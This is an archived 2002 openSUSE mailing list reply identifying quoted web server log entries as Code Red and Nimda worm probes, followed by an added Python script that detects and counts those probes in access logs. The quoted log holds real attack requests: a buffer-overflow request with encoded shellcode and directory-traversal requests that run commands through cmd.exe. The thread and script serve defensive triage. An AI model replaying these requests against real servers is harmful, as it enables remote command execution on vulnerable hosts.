Mailinglist Archive: opensuse (3644 mails)

Re: [SLE] web log
These are the Code Red / Nimda attack signatures. You can just ignore them
since you are not at risk. I know, they really clutter up the logs though.

I do not think there is a way to keep them out of the log. On the security list
they went around on this, and I do not remember any specific resolution
which would keep them out of the log files. (Anyone know of a way to
avoid logging these entries?)

Jim

03/12/02 05:19:04 PM, Landy Roman <landy@xxxxxxxxxxxxxxx> wrote:


I saw these entries in my weblog. Anything I can do against this?



61.182.248.223 - - [12/Mar/2002:07:47:44 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 331
64.133.27.115 - - [12/Mar/2002:10:23:19 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 401 476
64.133.27.115 - - [12/Mar/2002:10:23:20 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 401 476
64.133.27.115 - - [12/Mar/2002:10:23:20 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476
64.133.27.115 - - [12/Mar/2002:10:23:20 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476
64.133.27.115 - - [12/Mar/2002:10:23:20 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476
64.133.27.115 - - [12/Mar/2002:10:23:21 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476
64.133.27.115 - - [12/Mar/2002:10:23:21 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476
64.133.27.115 - - [12/Mar/2002:10:23:21 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476
64.133.27.115 - - [12/Mar/2002:10:23:21 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476
64.133.27.115 - - [12/Mar/2002:10:23:22 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
64.133.27.115 - - [12/Mar/2002:10:23:22 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476
64.133.27.115 - - [12/Mar/2002:10:23:22 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476
64.133.27.115 - - [12/Mar/2002:10:23:22 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294
64.133.27.115 - - [12/Mar/2002:10:23:23 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294
64.133.27.115 - - [12/Mar/2002:10:23:23 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476
64.133.27.115 - - [12/Mar/2002:10:23:23 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476
202.5.152.215 - - [12/Mar/2002:12:01:15 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 331
146.155.10.241 - - [12/Mar/2002:12:50:04 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 331
212.205.99.248 - - [12/Mar/2002:13:07:02 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 331
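
An added example, not part of the original thread: one way to triage an access log like the one quoted above after the fact. The two patterns are heuristics derived from the request shapes in that log, the sample lines are constructed, and the function names are this example's own.

```python
import re
from collections import Counter

# Apache Common Log Format: host ident user [time] "request" status bytes
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([^"]*)" (\d{3}) \S+$')

# Request shapes seen in the quoted log (heuristics, not a full signature set).
SIGNATURES = [
    ("code-red", re.compile(r"^GET /default\.ida\?N{50,}")),
    ("nimda", re.compile(r"^GET /\S*(?:root|cmd)\.exe\?/c\+", re.I)),
]

def classify(request):
    """Return the worm label for a request line, or None for ordinary traffic."""
    for label, pattern in SIGNATURES:
        if pattern.search(request):
            return label
    return None

def triage(lines):
    """Split a log into ordinary lines, per-(worm, host) counts, and probes
    that were answered with a 2xx status and so deserve a closer look."""
    clean, counts, answered = [], Counter(), []
    for line in lines:
        m = CLF.match(line.strip())
        label = classify(m.group(2)) if m else None
        if label is None:
            clean.append(line)  # unparsed lines are kept, never dropped
            continue
        counts[(label, m.group(1))] += 1
        if m.group(3).startswith("2"):
            answered.append(line)
    return clean, counts, answered

# Constructed sample input (documentation addresses, shortened payload).
SAMPLE = [
    '192.0.2.10 - - [12/Mar/2002:07:47:44 -0500] "GET /default.ida?' + "N" * 224
    + '%u9090%u6858=a HTTP/1.0" 400 331',
    '198.51.100.7 - - [12/Mar/2002:10:23:19 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 401 476',
    '198.51.100.7 - - [12/Mar/2002:10:23:20 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476',
    '198.51.100.7 - - [12/Mar/2002:10:23:22 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 512',
    '203.0.113.5 - - [12/Mar/2002:10:30:00 -0500] "GET /index.html HTTP/1.0" 200 1043',
]

if __name__ == "__main__":
    clean, counts, answered = triage(SAMPLE)
    for (label, host), n in sorted(counts.items()):
        print(f"{host}\t{label}\t{n} probe(s)")
    print(f"{len(clean)} ordinary line(s) kept; {len(answered)} probe(s) answered 2xx")
```

The `clean` list is the log with the worm noise filtered out for reading; the original file is left untouched so the probes remain available as evidence.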
